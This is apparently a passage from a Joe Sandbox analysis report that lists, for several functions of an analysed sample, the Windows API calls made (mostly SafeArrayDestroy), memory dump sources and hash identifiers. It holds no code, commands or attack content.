                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d33a49961afcb65def9255b8bcd2743ba720e9f668af1da2ac1a395e9b1d0858
                                                                                                                                                                                                                                              • Instruction ID: 0d8833238420453729dad8b42bc01e43997980b10b8924d9bbc44cbee9b4bdb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33a49961afcb65def9255b8bcd2743ba720e9f668af1da2ac1a395e9b1d0858
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F310D70E016189FDB10DB69CC80B5DB7B9AF85208F74858AE429EB741D775E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 576bf6df0f2d2bbf9a81dbb4e15f43010cbb2346569363f810a1176724cb8226
                                                                                                                                                                                                                                              • Instruction ID: 970b9ce50e3d8ba223ccc93b3a2b3f5279a115c46439a960fc8519e37e590625
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576bf6df0f2d2bbf9a81dbb4e15f43010cbb2346569363f810a1176724cb8226
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C313C70E416189FCB10DF69CC80B9EB7B9AF95208F34858AE429EB741C771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 546f64e3fd31c49333aacb389d9695ea51d291369b3e312c92ad90ad59b4da5d
                                                                                                                                                                                                                                              • Instruction ID: 50f5327defba57fecd7ca528b77105022947ca6902a1ef9fdd2ae94d7a9f878a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 546f64e3fd31c49333aacb389d9695ea51d291369b3e312c92ad90ad59b4da5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1314BB0E016589FCB10DBA9CC84B9DB7B9AF99308F30858AE428E7741C7B1D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF00B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 576bf6df0f2d2bbf9a81dbb4e15f43010cbb2346569363f810a1176724cb8226
                                                                                                                                                                                                                                              • Instruction ID: 556390cafe4fd650edcaa74773fde75c2f6101c148041d366a0c4852cbec68cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576bf6df0f2d2bbf9a81dbb4e15f43010cbb2346569363f810a1176724cb8226
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4312BB0A016589FCB10DFA9CC84B9DB7B9AF95304F34859AE468E7741CB71DD418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF01BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: eab4653ac25476485cb78fb3b563302f246ec255b0f14a9545c1326735cf5e4c
                                                                                                                                                                                                                                              • Instruction ID: 215b7dc5d78a740dee666bbc96f47d79ee6cd7e452f590ddd5a5ae92b38d1e0f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eab4653ac25476485cb78fb3b563302f246ec255b0f14a9545c1326735cf5e4c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00316DB0E016589FDB10DFA9CC84B9DB7BAAF95204F30859AE418E7741C771DD418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF02C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: f27df964d5b2ed547ed6a817c264074fd48cd8137da31fb84152b7ac7983cbcd
                                                                                                                                                                                                                                              • Instruction ID: 174aa717e4730783847b41d4a62c0458d042cf57f493702cbacf9a7db42bbbe6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f27df964d5b2ed547ed6a817c264074fd48cd8137da31fb84152b7ac7983cbcd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0314DB0A016589FCB10CFA9CC84B9DB7B9AF95304F70869AE468E7741C771D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF03DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 01bb872f15a0adb0d9ae84cd52a60b8f28614c4e353d9ba006000eefa409e6b9
                                                                                                                                                                                                                                              • Instruction ID: 824083e0f254f61dc88db509bab23ec0bfd8153b4502fb323c35efda1c7a0ba6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01bb872f15a0adb0d9ae84cd52a60b8f28614c4e353d9ba006000eefa409e6b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29314DB0E016589FCB10CFA9CC84B9DB7B9AF95204F70869AE468E7741CB71D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEFD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d33a49961afcb65def9255b8bcd2743ba720e9f668af1da2ac1a395e9b1d0858
                                                                                                                                                                                                                                              • Instruction ID: b2748feaebf1873e96f49e3a005c047dcca2a713046ace107917f1667878c3f8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33a49961afcb65def9255b8bcd2743ba720e9f668af1da2ac1a395e9b1d0858
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB315CB0E016589FCB10CFA9CC84B9DB7B9AF99208F30858AE418E7741C771ED418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF9011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 546f64e3fd31c49333aacb389d9695ea51d291369b3e312c92ad90ad59b4da5d
                                                                                                                                                                                                                                              • Instruction ID: 3ebff714b183264ebe1c20c4139e6877fc978ab939a5465ea0f82e766fdd66b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 546f64e3fd31c49333aacb389d9695ea51d291369b3e312c92ad90ad59b4da5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86312D70E016189FCB10DF69CC80B9EB7B9AF85208F74858AE429EB741D771D981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF4249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CF425B1,?,00000000,?), ref: 6CF424E6
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CF4251B
                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CF4253B
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CF42550
                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CF4255E
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 6CF42568
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
